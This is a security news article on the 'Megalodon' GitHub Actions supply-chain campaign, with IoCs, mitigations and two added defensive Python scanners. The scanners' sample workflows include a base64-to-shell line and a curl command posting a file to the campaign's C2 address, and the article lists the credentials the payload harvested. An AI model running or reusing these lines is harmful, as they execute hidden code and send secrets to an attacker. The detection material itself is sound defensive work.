Cyber Security News | Technology

Megalodon Malware Compromised 5,500+ GitHub Repos Within 6 Hours


May 22, 2026 | Guru Baran | Live Editorial

Summary

Why it matters

  • A sweeping automated supply chain attack codenamed “Megalodon” struck GitHub on May 18, 2026, injecting malicious CI/CD backdoors into over 5,500 repositories in less than six hours, one of the most aggressive GitHub Actions poisoning campaigns recorded to date.
  • SafeDep found that, within a window of roughly six hours on May 18, 2026 (UTC), the campaign pushed 5,718 malicious commits to 5,561 GitHub repositories from throwaway accounts with randomized eight-character usernames.

The attacker forged automation-style author identities (build-bot, auto-ci, ci-bot, pipeline-bot) with the email addresses build-system@noreply.dev and ci-bot@automated.dev, mimicking routine automated CI maintenance. Commit messages such as “ci: add build optimization step” and “chore: optimize pipeline runtime” were chosen to pass casual code review.

Megalodon Payload Variants

The campaign deployed two distinct GitHub Actions workflow variants that share the same C2 server at 216.126.225.129:8443:

  • SysDiag (mass variant): adds a new .github/workflows/ci.yml that triggers on every push and on pull_request_target, so the payload runs on any commit to any branch. Because pull_request_target executes in the context of the base repository, it also runs with that repository's secrets for pull requests that come from forks.
  • Optimize-Build (targeted variant): replaces existing workflows with a workflow_dispatch-only trigger, creating a dormant backdoor the attacker can activate on demand through the GitHub API. Until it is dispatched it produces no visible CI runs and no failed builds.


Both variants requested elevated permissions: id-token: write and actions: read. With id-token: write a job can request a GitHub Actions OIDC token, and any cloud account configured to trust GitHub's OIDC issuer will exchange that token for short-lived credentials, which is what makes the stolen token usable for cloud identity impersonation.
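To triage workflow files for the two variants described above (and to check the SHA-pinning point from the article's mitigation list), here is an added Python example; it is not SafeDep's or the article's own tooling. The trigger and permission combinations, the C2 address and the base64-decode-to-shell pattern are taken from the article. The three sample workflows are constructed, and the action references, step contents and the pinned SHA in them are assumptions.

```python
"""Triage GitHub Actions workflow files for the two Megalodon variants.
Added example; not SafeDep's or the article's tooling. Trigger, permission and
C2 indicators are from the article; the three workflow texts are constructed
samples (step contents, action references and the pinned SHA are assumptions)."""
import re

C2_IP = "216.126.225.129"
SHA_PIN = re.compile(r"^[0-9a-f]{40}$")

# Constructed: SysDiag-style mass variant (push + pull_request_target).
SYSDIAG = """\
on: [push, pull_request_target]
permissions:
  id-token: write
  actions: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo ZWNobyBoZWxsbw== | base64 -d | bash
      - run: curl -s http://216.126.225.129:8443/ -d @/tmp/o
"""
# Constructed: Optimize-Build-style dormant variant (workflow_dispatch only).
OPTIMIZE_BUILD = """\
on:
  workflow_dispatch:
permissions:
  id-token: write
  actions: read
jobs:
  optimize:
    runs-on: ubuntu-latest
    steps:
      - run: echo ZWNobyBoZWxsbw== | base64 --decode | sh
      - run: curl -s http://216.126.225.129:8443/ -d @/tmp/o
"""
# Constructed: benign workflow with a read-only token and a SHA-pinned action.
BENIGN = """\
on: [push, pull_request]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11
      - run: npm ci && npm test
"""

def _block(text, key):
    """Non-blank indented lines under top-level `key:` (regex-based: no YAML library needed)."""
    m = re.search(rf"^{key}:[ \t]*\n((?:[ \t]+\S.*\n?)+)", text, re.M)
    return [l for l in m.group(1).splitlines() if l.strip()] if m else []

def triggers(text):
    """Set of event names under `on:`, for both `on: [a, b]` and the mapping form."""
    m = re.search(r"^on:[ \t]*\[([^\]]*)\]", text, re.M)
    if m:
        return {t.strip() for t in m.group(1).split(",") if t.strip()}
    lines = _block(text, "on")
    if not lines:
        return set()
    top = min(len(l) - len(l.lstrip()) for l in lines)  # keep direct children only
    return {l.strip().rstrip(":") for l in lines if len(l) - len(l.lstrip()) == top}

def permissions(text):
    """scope -> level under `permissions:` (`read-all`/`write-all` shorthand is not expanded)."""
    return dict(re.findall(r"^[ \t]+([\w-]+):[ \t]*(\S+)", "\n".join(_block(text, "permissions")), re.M))

def unpinned_actions(text):
    """`uses:` references not pinned to a full commit SHA (the article's pinning mitigation)."""
    refs = re.findall(r"^[ \t]*-?[ \t]*uses:[ \t]*(\S+)", text, re.M)
    return [r for r in refs if not r.startswith(("./", "docker://"))
            and not SHA_PIN.match(r.partition("@")[2])]

def scan_workflow(text):
    """Finding strings for one workflow file; an empty list means nothing matched."""
    on, perms, found = triggers(text), permissions(text), []
    if C2_IP in text:
        found.append(f"c2: contacts {C2_IP}")
    if re.search(r"base64[ \t]+(-d|--decode)[ \t]*\|[ \t]*(ba)?sh\b", text):
        found.append("exec: base64-decoded shell payload")
    if perms.get("id-token") == "write":
        found.append("perm: id-token: write (job can mint a cloud-trusted OIDC token)")
    if "pull_request_target" in on:
        found.append("trigger: pull_request_target (runs in base-repo context with its secrets)")
    if on == {"workflow_dispatch"}:
        found.append("trigger: workflow_dispatch only (dormant until dispatched via the API)")
    return found + [f"pin: {r} is not SHA-pinned" for r in unpinned_actions(text)]

def classify(text):
    """Map findings onto the article's two variants."""
    found, on = scan_workflow(text), triggers(text)
    has_c2 = any(f.startswith("c2") for f in found)
    if not found:
        return "clean"
    if has_c2 and "pull_request_target" in on:
        return "sysdiag-like"
    if has_c2 and on == {"workflow_dispatch"}:
        return "optimize-build-like"
    return "suspicious"
```

Run it over every file under .github/workflows/ in each repository (for example `classify(open(path).read())`); a `pin:` finding on its own is hygiene, while `c2:`, `exec:` or `id-token: write` combined with the trigger findings is the pattern the article describes. The parser is deliberately regex-based so it can run on a bare runner; a full YAML parse is the right choice once the workflow files use anchors or multi-document syntax.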

Technical Background

The base64-encoded bash payload, a 111-line script, performed aggressive multi-phase credential harvesting once triggered:

  • All CI environment variables, /proc/*/environ, and the environment of PID 1
  • AWS credentials (access keys, secret keys, session tokens) across all configured profiles
  • GCP access tokens via gcloud auth print-access-token
  • Live credentials from the AWS IMDSv2, GCP metadata, and Azure IMDS endpoints
  • SSH private keys, Docker auth configs, .npmrc, .netrc, Kubernetes configs, Vault tokens, and Terraform credentials
  • Source code grep-scanned against 30+ regex patterns targeting API keys, JWTs, database connection strings, PEM keys, and cloud tokens
  • GitHub Actions OIDC tokens, enabling direct cloud identity impersonation

The attack's most critical downstream impact hit Tiledesk, an open-source live chat platform.


The attacker compromised the Tiledesk GitHub repository and replaced the legitimate Docker build workflow with the Optimize-Build backdoor in commit acac5a9. The maintainer, unaware that the repository was poisoned, subsequently published @tiledesk/tiledesk-server versions 2.18.6 through 2.18.12 to npm, propagating the backdoor to the package registry.

Application code remained untouched; only the workflow file changed.

Indicators of Compromise (IoC)

  • C2 server: hxxp://216[.]126[.]225[.]129:8443
  • Campaign ID: megalodon
  • Author emails: build-system@noreply[.]dev, ci-bot@automated[.]dev
  • Author names: build-bot, auto-ci, ci-bot, pipeline-bot
  • Mass workflow: .github/workflows/ci.yml (SysDiag)
  • Targeted workflow: Optimize-Build (workflow_dispatch)
  • Affected npm versions: @tiledesk/tiledesk-server 2.18.6–2.18.12
  • Malicious commit: acac5a9854650c4ae2883c4740bf87d34120c038

Security Posture and Risk

Mitigations

Organizations should act immediately if any repository received a commit from build-system@noreply[.]dev or ci-bot@automated[.]dev on May 18, 2026:

  • Revert the malicious commit and audit all .github/workflows/ files
  • Rotate all secrets accessible to GitHub Actions runners: tokens, API keys, SSH keys, cloud credentials
  • Audit cloud logs for anomalous OIDC token requests from unknown workflow runs
  • Check the Actions tab for unexpected workflow_dispatch executions
  • Pin GitHub Actions to specific commit SHAs rather than mutable version
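For the first and third mitigation steps above (finding the IoC commits in history, and auditing cloud logs for OIDC role assumptions that do not belong to a known workflow), the following Python is an added example and not SafeDep's or the article's own tooling. The author names, emails, commit subjects, attack date and the Tiledesk commit hash come from the article's IoCs; the git log lines and the CloudTrail records are constructed, the CloudTrail field layout is assumed, and EXPECTED_SUBS is a stand-in for the repository/ref identities your own deploy role trusts.

```python
"""Hunt for Megalodon indicators in git history and in AWS CloudTrail.
Added example; not SafeDep's or the article's tooling. Author names, emails,
commit subjects, date and commit hash are the article's IoCs. The log lines
and CloudTrail records are constructed; EXPECTED_SUBS is an assumption
standing in for the repo/ref pairs your deploy role should trust."""
import json

IOC_EMAILS = {"build-system@noreply.dev", "ci-bot@automated.dev"}
IOC_NAMES = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}
IOC_SUBJECTS = {"ci: add build optimization step", "chore: optimize pipeline runtime"}
ATTACK_DAY = "2026-05-18"
US = "\x1f"  # unit separator: safe even if a commit subject contains "|"

# Constructed output of:
#   git log --all --date=short --format="%H%x1f%an%x1f%ae%x1f%ad%x1f%s" -- .github/workflows
SAMPLE_LOG = "\n".join(US.join(r) for r in [
    ("acac5a9854650c4ae2883c4740bf87d34120c038", "build-bot",
     "build-system@noreply.dev", "2026-05-18", "ci: add build optimization step"),
    ("1" * 40, "Jane Maintainer", "jane@example.com", "2026-05-17", "ci: bump node to 22"),
    ("2" * 40, "pipeline-bot", "ops@example.com", "2026-05-18", "chore: optimize pipeline runtime"),
])

def flag_commits(log_text):
    """(sha, reasons) for every commit matching an IoC; reasons explain the hit."""
    hits = []
    for line in log_text.splitlines():
        sha, name, email, day, subject = line.split(US)
        reasons = []
        if email in IOC_EMAILS:
            reasons.append("ioc-email")
        if name in IOC_NAMES:
            reasons.append("ioc-author")
        if subject in IOC_SUBJECTS:
            reasons.append("ioc-subject")
        if reasons and day == ATTACK_DAY:
            reasons.append("attack-day")
        if reasons:
            hits.append((sha, reasons))
    return hits

# Assumption: the only GitHub identities that should ever assume the deploy role.
# For branch runs the GitHub OIDC `sub` claim has the form repo:<owner>/<repo>:ref:<ref>.
EXPECTED_SUBS = {"repo:example-org/web:ref:refs/heads/main"}
GITHUB_OIDC = "token.actions.githubusercontent.com"

# Constructed CloudTrail records in the shape of AssumeRoleWithWebIdentity events
# (field names as assumed here; check them against your own trail before relying on them).
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2026-05-18T14:02:11Z", "eventName": "AssumeRoleWithWebIdentity",
     "userIdentity": {"type": "WebIdentityUser", "identityProvider": GITHUB_OIDC,
                      "userName": "repo:example-org/web:ref:refs/heads/main"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/deploy"}},
    {"eventTime": "2026-05-18T15:47:03Z", "eventName": "AssumeRoleWithWebIdentity",
     "userIdentity": {"type": "WebIdentityUser", "identityProvider": GITHUB_OIDC,
                      "userName": "repo:example-org/web:ref:refs/heads/fix/ci"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/deploy"}},
    {"eventTime": "2026-05-18T16:00:00Z", "eventName": "AssumeRole",
     "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/admin"}},
]})

def anomalous_oidc_assumptions(trail_json, expected_subs):
    """Web-identity role assumptions from GitHub whose `sub` is not on the allow-list."""
    out = []
    for ev in json.loads(trail_json)["Records"]:
        ident = ev.get("userIdentity", {})
        if ev.get("eventName") != "AssumeRoleWithWebIdentity" or ident.get("identityProvider") != GITHUB_OIDC:
            continue
        sub = ident.get("userName", "")
        if sub not in expected_subs:
            out.append((ev["eventTime"], sub, ev["requestParameters"]["roleArn"]))
    return out
```

One limit worth knowing before trusting the second check: a dormant Optimize-Build workflow committed to the trusted branch produces exactly the expected `sub`, so an allow-list on `sub` alone will not catch it. Correlate every role assumption's timestamp with the repository's Actions run list (the article's "check the Actions tab" step); an assumption with no matching, expected run is the signal.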

Source profile

Source and editorial details

Source
Cyber Security News
Original title
Megalodon Malware Compromised 5,500+ GitHub Repos Within 6 Hours
Canonical
https://cybersecuritynews.com/megalodon-malware-github-repos/
Source URL
https://cybersecuritynews.com/megalodon-malware-github-repos/
